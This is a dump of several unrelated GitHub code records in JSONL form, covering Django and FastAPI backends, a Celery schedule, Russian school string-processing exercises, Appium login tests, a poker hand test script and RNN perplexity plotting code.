matches.add(matching_order.id)\n matching_order = get_matching_order(session, order, exclude=matches)\n\n\nqueue.create_trading_consumer(handle_order)\n","repo_name":"NiharS/trading_exchange","sub_path":"order_matcher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22319210069","text":"from django.urls import path\nfrom django.conf.urls import url, include \nfrom rest_framework.routers import DefaultRouter\n\nfrom . import views\n\n\napp_name = 'chat'\n\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('h', views.h, name='h'),\n path('api/v1/create/', views.create_room, name='create_room'),\n path('register/', views.register, name='register'),\n path('logout/', views.logout_request, name='logout'),\n path('api/v1/search/', views.search, name='search'),\n path('chat/', views.chat, name='chat'),\n path('test/', views.test, name='test'),\n path('api/v1/chats', views.get_chat, name='get_chat'),\n #path('chats', views.get_chat, name='get_chat'),\n path('api/v1/chats/', views.get_messages, name='get_messages'),\n]","repo_name":"TomHellCat/Chatter","sub_path":"Django Backend/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2474988785","text":"import os\n\nfrom celery import Celery\nfrom celery.schedules import crontab\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'not_clean.settings')\n\n\napp = Celery('not_clean')\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n 'spam_task': {\n 'task': 'blog.tasks.schedule_task',\n 'schedule': crontab(minute='*/1')\n }\n}\n","repo_name":"ArtsemDev/news_very_cool_portal","sub_path":"not_clean/not_clean/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7204267021","text":"'''\n1) В текстовом файле k7-3.txt находится цепочка из символов латинского алфавита A, B, C. Найдите\nдлину самой длинной подцепочки, состоящей из символов C.\n'''\n\nfile = open('k7-3.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n if char == 'C':\n count += 1\n continue\n if max_count < count:\n max_count = count\n count = 0\nprint('1.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n2) В текстовом файле k7a-2.txt находится цепочка из символов латинского алфавита A, B, C, D, E, F.\nНайдите длину самой длинной подцепочки, состоящей из символов A, C, D (в произвольном порядке).\n'''\n\nfile = open('k7a-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n if char in 'ACD':\n count += 1\n continue\n if max_count < count:\n max_count = count\n count = 0\nprint('2.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n3) В текстовом файле k7b-2.txt находится цепочка из символов латинского алфавита A, B, C, D, E, F.\nНайдите максимальную длину цепочки вида DBACDBACDBAC.... (состоящей из фрагментов DBAC,\nпоследний фрагмент может быть неполным).\n'''\n\nfile = open('k7b-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n if (char == 'D' and count % 4 == 0) or \\\n (char == 'B' and count % 4 == 1) or \\\n (char == 'A' and count % 4 == 2) or \\\n (char == 'C' and count % 4 == 3):\n count += 1\n continue\n if max_count < count:\n max_count = count\n count = 0\n if char == \"D\":\n count = 1\nprint('3.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n4) В текстовом файле k7c-2.txt находится цепочка из символов латинского алфавита A, B, C, D, E, F.\nНайдите количество цепочек длины 3, удовлетворяющих следующим условиям:\n 1-й символ – один из A, C, E;\n 2-й символ – один из A, D, F, который не совпадает с первым;\n 3-й символ – один из A, B, F, который не совпадает со вторым.\n'''\n\nfile = open('k7c-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nfor i in range(len(data) - 2):\n if data[i] in \"ACE\" and \\\n data[i + 1] in \"ADF\" and data[i] != data[i + 1] and \\\n data[i + 2] in \"ABF\" and data[i + 2] != data[i + 1]:\n count += 1\nprint('4.', count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n5) В текстовом файле k8-25.txt находится цепочка из символов, в которую могут входить заглавные\nбуквы латинского алфавита A…Z и десятичные цифры. Найдите длину самой длинной подцепочки,\nсостоящей из одинаковых символов. Если в файле несколько подходящих цепочек одинаковой длины,\nнужно взять первую из них. Выведите сначала символ, из которого строится эта подцепочка, а затем через\nпробел – длину этой подцепочки.\n'''\n\nfile = open('k8-25.txt')\ndata = file.read()\nfile.close()\ncount = 1\nmax_count = 0\nmax_char = data[0]\nlast_char = data[0]\nfor char in data:\n if char == last_char:\n count += 1\n continue\n elif max_count < count:\n max_count = count\n max_char = last_char\n last_char = char\n count = 1\nprint('5.', max_char, max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n6) Текстовый файл k8-2.txt состоит не более чем из 10^6\nсимволов. Определите максимальное количество\nидущих подряд символов, среди которых каждые два соседних различны.\n'''\n\nfile = open('k8-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor i in range(1, len(data) - 1):\n if data[i] != data[i + 1]:\n count += 1\n continue\n elif max_count < count:\n max_count = count\n count = 1\nprint('6.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n159) Текстовый файл 24-157.txt содержит только заглавные буквы латинского алфавита (ABC…Z). Определите символ,\nкоторый чаще всего встречается в файле между двумя одинаковыми символами. Например, в тексте CCBAABABCBC есть\nкомбинации ABA, BAB, BCB и CBC. Чаще всего – 2 раза – между двумя одинаковыми символами стоит B, в ответе для этого\nслучая надо написать B2 (без пробелов и других разделителей). Если таких символов несколько, выведите тот, который\nстоит раньше в алфавите.\n'''\n\nfile = open('24-157.txt')\ndata = file.read()\nfile.close()\nchars = {}\nfor i in range(65, 91):\n chars[chr(i)] = 0\n\nfor i in range(1, len(data) - 1):\n if data[i - 1] == data[i + 1]:\n chars[data[i]] += 1\n\nmax_value = max(list(chars.values()))\n\nmax_char = ''\nfor char in chars:\n if chars[char] == max_value:\n max_char = char\n break\n\nprint(f'159. {max_char}{max_value}')\n\n'''\nОтветы: 1. 1\n 2. 11\n 3. 95\n 4. 891\n 5. V 8\n 6. 166\n 159. W1608\n'''\n","repo_name":"Andrey-Bedretdinov/School","sub_path":"Архив/Homework/Homework 23.11.21/Homework 23.11.21.py","file_name":"Homework 23.11.21.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21384776873","text":"import time\nimport warnings\n\nfrom library.core.TestCase import TestCase\nfrom library.core.common.simcardtype import CardType\nfrom library.core.utils.applicationcache import current_mobile, current_driver, switch_to_mobile\nfrom library.core.utils.testcasefilter import tags\n\nfrom pages.call.CallPage import CallPage\nfrom pages.login.LoginPage import OneKeyLoginPage\n\nfrom preconditions.BasePreconditions import LoginPreconditions\n\nREQUIRED_MOBILES = {\n 'Android-移动': 'M960BDQN229CH',\n 'IOS-移动': '',\n 'Android-电信': 'single_telecom',\n 'Android-联通': 'single_union',\n 'Android-移动-联通': 'mobile_and_union',\n 'Android-移动-电信': '',\n 'Android-移动-移动': 'double_mobile',\n 'Android-XX-XX': 'others_double',\n}\n\n\nclass Preconditions(LoginPreconditions):\n \"\"\"\n 分解前置条件\n \"\"\"\n\n @staticmethod\n def select_single_cmcc_android_4g_client():\n \"\"\"\n 启动\n 1、4G,安卓客户端\n 2、移动卡\n :return:\n \"\"\"\n client = switch_to_mobile(REQUIRED_MOBILES['测试机'])\n client.connect_mobile()\n\n @staticmethod\n def connect_mobile(category):\n \"\"\"选择手机手机\"\"\"\n client = switch_to_mobile(REQUIRED_MOBILES[category])\n client.connect_mobile()\n return client\n\n @staticmethod\n def select_assisted_mobile2():\n \"\"\"切换到单卡、异网卡Android手机 并启动应用\"\"\"\n switch_to_mobile(REQUIRED_MOBILES['辅助机2'])\n current_mobile().connect_mobile()\n\n # @staticmethod\n # def login_by_one_key_login():\n # \"\"\"\n # 从一键登录页面登录\n # :return:\n # \"\"\"\n # # 等待号码加载完成后,点击一键登录\n # one_key = OneKeyLoginPage()\n # one_key.wait_for_tell_number_load(60)\n # login_number = one_key.get_login_number()\n # one_key.click_one_key_login()\n # one_key.click_sure_login()\n # # 等待消息页\n # gp = GuidePage()\n # try:\n # gp.click_cancel_update()\n # # gp.click_the_checkbox()\n # # gp.click_the_no_start_experience()\n # except:\n # gp.click_text(\"暂不升级\")\n # pass\n # cp = CallPage()\n # cp.click_contact_tip()\n # return login_number\n\n @staticmethod\n def app_start_for_the_first_time():\n \"\"\"首次启动APP(使用重置APP代替)\"\"\"\n current_mobile().reset_app()\n\n @staticmethod\n def terminate_app():\n \"\"\"\n 强制关闭app,退出后台\n :return:\n \"\"\"\n app_id = current_driver().capabilities['appPackage']\n current_mobile().terminate_app(app_id)\n\n @staticmethod\n def background_app(seconds):\n \"\"\"后台运行\"\"\"\n current_mobile().background_app(seconds)\n\n @staticmethod\n def reset_and_relaunch_app():\n \"\"\"首次启动APP(使用重置APP代替)\"\"\"\n app_package = 'com.cmic.college'\n current_driver().activate_app(app_package)\n current_mobile().reset_app()\n\n\nclass LoginTest(TestCase):\n \"\"\"Login 模块\"\"\"\n\n @classmethod\n def setUpClass(cls):\n warnings.simplefilter('ignore', ResourceWarning)\n\n @staticmethod\n def setUp_test_login_0001():\n Preconditions.select_mobile('Android-移动')\n current_mobile().hide_keyboard_if_display()\n Preconditions.app_start_for_the_first_time()\n Preconditions.make_already_in_one_key_login_page()\n\n @tags('ALL', 'CMCC', 'login')\n def test_login_0001(self):\n \"\"\"\n 取消首次登录时登录按钮的置灰显示\t\"1、正常网络\n 2、当前在一键登录页面\n 3、用户首次登录\"\t\"1、查看页面显示\n 2、点击本机号码一键登录按钮\n 3、点击不同意\n 4、同2步骤,点击同意\n 5、点击确定按钮\"\t\"1、文案“登录即代表阅读并同意《软件许可服务协议》和《隐私和信息保护政策》”显示在底部,无勾选框,登录按钮高亮显示\n 2、弹出“用户协议和隐私保护,\n 欢迎使用密友圈,我们非常重视保护您的个人协议并严格遵守相关法律法规。\n 我们会根据国家相关法律法规不定时更新我们的软件许可协议和隐私协议,您可通过《软件许可服务协议》和《隐私和信息保护政策》查看详细条款,请您在使用密友圈前务必仔细阅读。\n 点击下方“同意”按钮,方可开始使用密友圈,与此同时我们将竭力保护您的隐私安全\n ”同意与不同意按钮\n 3、弹窗消失,停留当前页面\n 4、弹出“使用号码XXXX登录,登录后,在密友圈app内的视频通话、语音通话和聊天将使用该号码发起”确定按钮\n 5、成功进入密友圈\"\n :return:\n \"\"\"\n login = OneKeyLoginPage()\n # 检查一键登录\n cards = login.get_cards_c(CardType.CHINA_MOBILE)\n login.wait_for_page_load()\n login.wait_for_tell_number_load(timeout=10)\n login.click_text('一键登录')\n time.sleep(1)\n if login.is_text_present_c('用户协议和隐私保护'):\n login.click_locator_key_c('不同意')\n time.sleep(0.5)\n time.sleep(2)\n self.assertEqual(login.is_text_present_c('使用{}一键登录'.format(cards)), True)\n login.click_text('一键登录')\n time.sleep(1)\n if login.is_text_present_c('用户协议和隐私保护'):\n login.click_locator_key_c('同意')\n call = CallPage()\n call.is_text_present_c('通话', default_timeout=20)\n time.sleep(2)\n call.click_always_allow_c()\n time.sleep(3)\n call.remove_mask_c(2)\n self.assertEqual(call.is_on_this_page(), True)\n\n @staticmethod\n def setUp_test_login_0003():\n Preconditions.select_mobile('Android-移动')\n current_mobile().hide_keyboard_if_display()\n # Preconditions.app_start_for_the_first_time()\n Preconditions.make_already_in_one_key_login_page()\n\n @tags('ALL', 'CMCC', 'me')\n def test_login_0003(self):\n \"\"\" 非首次登陆\t\"1、正常网络\n 2、当前在一键登录页面\n 3、用户非首次登录\"\t\"1、点击一键登陆\n 2、点击确认使用XX号码登录\"\t成功登陆密友,进入通话页面\n \"\"\"\n login = OneKeyLoginPage()\n if login.is_text_present_c('一键登录'):\n login.wait_for_tell_number_load(20)\n login.click_text('一键登录')\n if login.is_text_present_c('用户协议和隐私保护'):\n login.click_locator_key_c('同意')\n call = CallPage()\n call.is_text_present_c('通话', default_timeout=20)\n time.sleep(2)\n call.click_always_allow_c()\n time.sleep(3)\n call.remove_mask_c(2)\n self.assertEqual(login.is_text_present_c(\"通话\"), True)\n","repo_name":"wangquansheng/appium-Demo","sub_path":"TestCase/m001_login/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"79126833","text":"# a = [1,2,3,4,5,6]\n# b = 0\n# for i in a:\n# b += 1\n# if b % 3 == 0:\n# print('remove%d'%i)\n# a.remove(i)\n# print(i)\n#\n# def KK(a):\n# if a %2==0:\n# return True, 0\n# else:\n# return False, 2\n#\n# a = KK(3)\n# print(a)\n# if a[0]:\n# print('dd')\n# b = KK(4)\n# print(b)\n# if b[0]:\n# print('ss')\n\n# from collections import Counter\n#\n# def Most_Common(lst):\n# data = Counter(lst)\n# return data.most_common(1)[0]\n#\n# lst = ['A', 'A', 'A', 'A', 2]\n# print(Most_Common(lst))\n#\n# lst = [13,4,13,14,1]\n# print(sorted(lst))\n# from Game.utils import *\n# players = [Player() for i in range(5)]\n# p2 = players[2]\n# p2.bet(300)\n# print(p2.possess)\n# print(players[2].possess)\n# print(id(p2))\n# print(id(players[2]))\n#\n# p2.current_state = Player_State.ALLIN\n# print(players[2].current_state)\n\n# a = ' d a '\n# print(a.strip(' ').split(' '))\n\n# a = [1,2,3,4,5,6]\n# print(a[3:])\n\nfrom Game.utils import *\npublic_cards = [Card('10', 'hearts'), Card('J', 'spades'), Card('Q', 'clubs'), Card('K', 'clubs'), Card('A', 'spades')]\n\nh1 = [Card('K', 'hearts'), Card('Q', 'diamonds')]\nh2 = [Card('J', 'clubs'), Card('2', 'diamonds')]\nh3 = [Card('4', 'diamonds'), Card('Q', 'spades')]\n\n# 测试比牌\nfrom evaluate_card import *\nhb1 = choose_own_biggest_card(h1+public_cards)\nhb2 = choose_own_biggest_card(h2+public_cards)\nhb3 = choose_own_biggest_card(h3+public_cards)\n\nprint(hb1)\nprint(hb2)\nprint(hb3)\n\n# 测试多人allin下筹码分配\nfrom Game.main import GameManager\npublic_cards = [Card('6', 'hearts'), Card('J', 'spades'), Card('Q', 'clubs'), Card('K', 'clubs'), Card('A', 'spades')]\nh1 = [Card('K', 'hearts'), Card('Q', 'diamonds')]\nh2 = [Card('J', 'clubs'), Card('10', 'diamonds')]\nh3 = [Card('10', 'diamonds'), Card('Q', 'spades')]\n\ngm = GameManager(4)\ngm.alive_player_id = alive_player_id = [0,1,2,3]\ngm.alive_player_num = 4\ngm.init_env(0, 3)\ngm.env.public_cards = public_cards\n\ngm.players[0].possess = 100\ngm.players[0].current_bet = 500\ngm.players[0].current_state = Player_State.FOLD\n\ngm.players[1].card = h1\ngm.players[1].possess = 0\ngm.players[1].current_bet = 3000\ngm.players[1].current_state = Player_State.ALLIN\n\ngm.players[2].card = h2\ngm.players[2].possess = 0\ngm.players[2].current_bet = 2000\ngm.players[2].current_state = Player_State.ALLIN\n\ngm.players[3].card = h3\ngm.players[3].possess = 0\ngm.players[3].current_bet = 2200\ngm.players[3].current_state = Player_State.ALLIN\n\ngm.print_info()\ngm.compare_card()\ngm.print_info()\n\n","repo_name":"sjyjytu/Holdem","sub_path":"Game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"3722322953","text":"from rest_framework import status\nfrom rest_framework.decorators import APIView\nfrom rest_framework.response import Response\nfrom .PendingJobsHandler import PendingJobsHandler\nfrom .models import Job\nfrom .serializers import CreateJobSerializer, ListJobSerializer\nfrom rest_framework.authentication import get_authorization_header\n\n\nclass Jobs(APIView):\n jobsHandler = PendingJobsHandler()\n\n def get(self, request, status_value=None):\n if status_value is None:\n job_data = Job.objects.all()\n serialized_data = ListJobSerializer(job_data, many=True)\n return Response(serialized_data.data, status=status.HTTP_200_OK)\n else:\n job_data = Job.objects.filter(status=status_value)\n serialized_data = ListJobSerializer(job_data, many=True)\n return Response(serialized_data.data, status=status.HTTP_200_OK)\n\n def post(self, request, status_value=None):\n if status_value is not None:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n header_info = get_authorization_header(request).decode(\"utf-8\")\n\n if header_info == \"allow\":\n new_job = CreateJobSerializer(data=request.data)\n if new_job.is_valid():\n new_job.save()\n\n if self.jobsHandler.isRunning is False:\n self.jobsHandler.process_pending_jobs()\n\n created_object = Job.objects.get(pk=new_job.data[\"id\"])\n serialized_object = ListJobSerializer(created_object)\n return Response(serialized_object.data, status=status.HTTP_201_CREATED)\n return Response(\n {\"error\": \"Unauthorized to access this resource\", \"status\": status.HTTP_401_UNAUTHORIZED},\n status=status.HTTP_401_UNAUTHORIZED\n )\n","repo_name":"felipe0328/csc_rest_api_python","sub_path":"rest_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33591789568","text":"import sys\nsys.path.insert(0, 'C:/Users/Natalia/Desktop/BA/Py Scripts')\n\nfrom utils import *\nimport matplotlib.pyplot as plt\n\ndef plot_RNN_ppl(base_ppl):\n fig = plt.figure(figsize=(25, 15))\n\n plt.subplot(2,2,1)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.diff.hidd.txt\", \"data/ppl.train.all.size17.diff.hidd.txt\", 0, 1)\n plt.plot(n, ppl_train, '-D', markevery=[8], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[8])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(8,2.129925),xytext=(8, 6.4), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17\")\n plt.legend()\n plt.xlabel(\"Hidden layer size (powers of 2)\")\n plt.ylabel(\"PPL net\")\n\n plt.subplot(2,2,2)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.hidd64.diff.bptt.txt\", \"data/ppl.train.all.size17.hidd64.diff.bptt.txt\", 0, 1)\n plt.plot(n, ppl_train, '-D', markevery=[72], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[72])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(72,2.129925),xytext=(72, 1.142), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17, hidden layer size=64\")\n plt.legend()\n plt.xlabel(\"BPTT step\")\n plt.ylabel(\"PPL net\")\n \n plt.subplot(2,2,3)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.hidd64.bptt72.diff.cls.txt\", \"data/ppl.train.all.size17.hidd64.bptt72.diff.cls.txt\", 1, 1)\n plt.plot(n, ppl_train, '-D', markevery=[72], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[72])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(72,1.129925),xytext=(72, 1.1425), rotation=45)\n #plt.annotate(\"Min test PPL: \"+str(min(ppl_test)),xy=(100,1.129591),xytext=(100, 1.142), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17, hidden layer size=64, bptt=72\")\n plt.legend()\n plt.xlabel(\"Number of classes\")\n plt.ylabel(\"PPL net\")\n\n fig.savefig('RNN_round_max_open_4_ppl.png', bbox_inches='tight')\n\n\ndef read_prob(file):\n '''\n Read probabilities of separate brackets based on RNN model.\n '''\n round_open = []\n round_closed = []\n end_of_sent = []\n with open(file, 'r') as f:\n for line in f:\n l = line.split()\n bracket = l[2].strip()\n if bracket==\"(\":\n round_open.append(float(l[1].strip()))\n elif bracket==\")\":\n round_closed.append(float(l[1].strip()))\n else:\n end_of_sent.append(float(l[1].strip()))\n return round_open, round_closed, end_of_sent\n\ndef plot_probs(ro, rc, eos):\n fig = plt.figure(figsize=(20, 8))\n plt.subplot(1,3,1)\n plt.hist(ro, bins=100)\n plt.title(\"Probabilities of round open brackets (\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n plt.subplot(1,3,2)\n plt.hist(rc, bins=100)\n plt.title(\"Probabilities of round closed brackets )\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n plt.subplot(1,3,3)\n plt.hist(eos, bins=100)\n plt.title(\"Probabilities of <\\s> sign\")\n plt.xlabel(\"Value\")\n plt.ylabel(\"Frequency\")\n\n fig.savefig('RNN_round_max_open_4_probs.png', bbox_inches='tight')\n #plt.show()\n\ndef main():\n print(\"Creating sentence dictionary with sentences consisting of round brackets.\")\n print(\"Maximal number of open brackets is 4, probability of an open bracket is 0.5.\")\n sent_dict = create_sent_dict(brackets, 1, [0.5,0.5], 4)\n print()\n print(\"Training data: 131,072 sentences, perplexity estimated from text: 1.4770440991905749\")\n print(\"Test data: 10,000 sentences, perplexity estimated from text: 1.4781559451539232\")\n baseline = calc_baseline_ppl(4, 0.5)\n print(\"Baseline perplexity:\", baseline)\n plot_RNN_ppl(baseline)\n print()\n print(\"Best RNN model: text size = 131,072, hidden layer size = 64, bptt = 72, number of classes = 73.\")\n print(\"Best perplexity result on test data: 1.479702.\")\n ro, rc, eos = read_prob(\"data/test.ppl.result.10000.round.4.debug.txt\")\n plot_probs(ro, rc, eos)\n \n \nif __name__ == '__main__':\n main()\n","repo_name":"NataliaSkachkova/rules_with_NN","sub_path":"Py Scripts/Max_4_open_round_brackets/max_sent_len_4_round_brackets_RNN.py","file_name":"max_sent_len_4_round_brackets_RNN.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37341496242","text":"import json\nimport os\nfrom services.user_photo_service import UserPhotoService\nimport requests\nimport aiohttp\nimport libs.format as Format\nimport libs.utilities as utilities\nimport middleware.auth as AuthMiddleware\nimport schemas.api_call as ApiCallSchema\nimport schemas.hashtag as HashtagSchema\nimport schemas.ml_model as ml_model_schema\nimport schemas.user as UserSchema\nfrom dotenv import load_dotenv\nfrom fastapi import APIRouter, Depends, Response, Request\nfrom fastapi.datastructures import UploadFile\nfrom fastapi.param_functions import File\nfrom models.prediction_request import PredictionRequest\nfrom models.result import Result\nfrom services.api_call_service import ApiCallService\nfrom services.hashtag_service import HashtagService\nfrom services.image_upload_service import ImageUploadService\nfrom services.model_cover_upload_service import ModelCoverUploadService\nfrom services.mlflow_service import MLflowService\nfrom services.model_like_service import ModelLikeService\nfrom services.user_service import UserService\nfrom services.model_comment_service import ModelCommentService\nimport util.validation as Validation\n\nload_dotenv()\nPREDICTION_SERVER = os.getenv('PREDICTION_SERVER')\nPREDICTION_SERVER_PORT = os.getenv('PREDICTION_SERVER_PORT')\n\naiohttp_session = aiohttp.ClientSession()\n\nrouter = APIRouter()\n\n\n# Get models\n@router.get('/models', status_code=200)\nasync def get_models(request: Request,\n response: Response,\n search_query: str = '',\n order: str = 'recent',\n page_number: int = 1, results_per_page: int = 10):\n accepted_orders = ['recent', 'popular', 'recently_used']\n results = []\n\n query_results_data = []\n\n # Check if order param exists and if it's accepted\n if order != '' and order not in accepted_orders:\n result = Result(\n Result.FAIL,\n 'Order parameter is not valid',\n Result.BAD_REQUEST\n )\n\n response.status_code = result.get_status_code()\n return result.to_dict()\n\n # Get models by order param\n if order == 'recent':\n # Get most recent models\n query_results = MLflowService.search_models(model_name=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n query_results_data = query_results.data\n\n elif order == 'popular':\n # Get most popular models\n query_results = ApiCallService.get_most_popular_models(search_query=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n\n query_results_data = query_results.data['models']\n\n elif order == 'recently_used':\n user_id = None\n # Check if authorization header exists\n if 'Authorization' in request.headers:\n # Get current user\n current_user = await AuthMiddleware.get_current_user(\n str(request.headers['Authorization']).replace('Bearer ', ''))\n user_id = current_user.data.id\n\n # Get recently used models\n query_results = ApiCallService.get_recently_used_models(user_id=user_id,\n search_query=search_query,\n page_number=page_number,\n results_per_page=results_per_page)\n query_results_data = query_results.data[\"models\"]\n\n else:\n query_results = Result(\n Result.FAIL,\n 'Order parameter is not valid',\n Result.NOT_ACCEPTABLE\n )\n\n # Return error\n if query_results.is_fail():\n response.status_code = query_results.get_status_code()\n return query_results.to_dict()\n\n for registered_model in query_results_data:\n\n # Validation is necessary because model_version from recently used is already formatted\n if order != 'recently_used':\n # Get user\n user = UserService.get_user_by_username(registered_model.tags['user_id'])\n if user.is_success():\n user = ml_model_schema.User(name=user.data.name, username=user.data.username)\n\n try:\n user.photo = UserPhotoService.get_user_photo(user.username)\n except:\n user.photo = None\n\n # Get hashtags\n hashtags_result = HashtagService.get_model_hashtags(model_name=registered_model.name)\n hashtags = hashtags_result.data if hashtags_result.is_success() else []\n print(\"[DEBUG] hashtags_result.is_success():\", hashtags_result.is_success())\n\n # Get API calls\n api_calls_result = ApiCallService.get_model_count(model_name=registered_model.name)\n api_calls = api_calls_result.data['count'] if api_calls_result.is_success() else 0\n print(\"[DEBUG] api_calls_result.is_success():\", api_calls_result.is_success())\n\n # Get likes\n user_id = None\n\n # Check if authorization header exists\n if 'Authorization' in request.headers:\n # Get current user\n current_user = await AuthMiddleware.get_current_user(\n str(request.headers['Authorization']).replace('Bearer ', ''))\n user_id = current_user.data.id\n\n likes_dict = {\n 'count': 0,\n 'has_liked_model': False\n }\n\n likes_dict['count'] = ModelLikeService.get_model_likes(model_name=registered_model.name,\n count_only=True).data\n likes_dict['has_liked_model'] = False\n\n # Check if user liked model\n if user_id:\n user_like = ModelLikeService.get_like(model_name=registered_model.name, user_id=user_id)\n\n if user_like.is_success() and user_like.data is not None:\n likes_dict['has_liked_model'] = True\n\n likes = ml_model_schema.Likes(**likes_dict)\n\n # Get comment count\n comment_count = ModelCommentService.get_model_comments(model_name=registered_model.name, count_only=True)\n comment_count = comment_count.data if comment_count.is_success() else 0\n\n # Get latest model version\n version = 0 if len(registered_model.latest_versions) == 0 else int(registered_model.latest_versions[0].version)\n\n # Get model's cover photo\n cover_photo = None\n try:\n cover_photo = ModelCoverUploadService.get_model_cover_photo(registered_model.name)\n except:\n cover_photo = None\n\n registered_model_dict = ml_model_schema.MlModelListing(name=registered_model.name,\n version=version,\n likes=likes,\n comment_count=comment_count,\n hashtags=hashtags,\n tags=registered_model.tags,\n api_calls=api_calls,\n creation_time=registered_model.creation_timestamp,\n last_update_time=registered_model.last_updated_timestamp,\n user=user,\n description=registered_model.description,\n cover_photo=cover_photo).dict()\n results.append(registered_model_dict)\n\n # Sorting here is necessary since it won't work when doing it with SQL, because SQL query is guaranteeing\n # that only the latest version of each model is being returned, by sorting by model name and version\n if order == 'recent':\n results = sorted(results, key=lambda x: x['creation_time'], reverse=True)\n\n return Result(\n Result.SUCCESS,\n 'Collected models successfully',\n results\n ).to_dict()\n\n\n# Get model\n@router.get('/models/{model_name}')\ndef get_model(model_name: str, response: Response, type: str = 'full'):\n # Get model version\n\n result = MLflowService.get_model(model_name)\n\n if result.is_success():\n # Format model version\n # if model_version == 0 => no deployment\n model_version = 0 if len(result.data.latest_versions) == 0 else int(result.data.latest_versions[0].version)\n\n username = result.data.tags[\"user_id\"]\n\n # Get user\n user = UserService.get_user_by_username(username)\n\n if user.is_success():\n user = ml_model_schema.User(name=user.data.name, username=user.data.username)\n\n # Get hashtags\n hashtags_result = HashtagService.get_model_hashtags(model_name=model_name)\n hashtags = hashtags_result.data if hashtags_result.is_success() else []\n print(\"[DEBUG] hashtags_result.is_success():\", hashtags_result.is_success())\n\n # Get github repo\n github_repo = result.data.tags.get(\"github_repo\")\n github_repo_files_url = Validation.get_github_raw_files_url(url = github_repo) if github_repo else None\n github_repo_readme_url = Validation.get_github_readme_url(url = github_repo) if github_repo else None\n\n # Get api calls\n api_calls_result = ApiCallService.get_model_count(model_name=model_name)\n api_calls = api_calls_result.data['count'] if api_calls_result.is_success() else 0\n print(f\"[DEBUG] api_calls_result.is_success():\", api_calls_result.is_success())\n\n # Get signature & input example\n if model_version == 0:\n signature = result.data.tags.get(\"signature\")\n input_example = result.data.tags.get(\"input_example\")\n else:\n signature_result = MLflowService.get_model_signature(model_name, model_version, result.data.latest_versions[0])\n signature = signature_result.data if signature_result.is_success() else None\n\n input_example_result = MLflowService.get_input_example(model_name, model_version, result.data.latest_versions[0])\n input_example = input_example_result.data if input_example_result.is_success() else None\n\n print(f\"[DEBUG] signature_result.is_success():\", signature_result.is_success())\n print(f\"[DEBUG] input_example_result.is_success():\", input_example_result.is_success())\n\n\n # TODO get metrics from model version\n metrics = json.loads(result.data.tags.get(\"metrics\")) if result.data.tags.get(\"metrics\") else None\n # TODO get parameters from model version\n parameters = json.loads(result.data.tags.get(\"params\")) if result.data.tags.get(\"params\") else None\n\n likes_dict = {\n 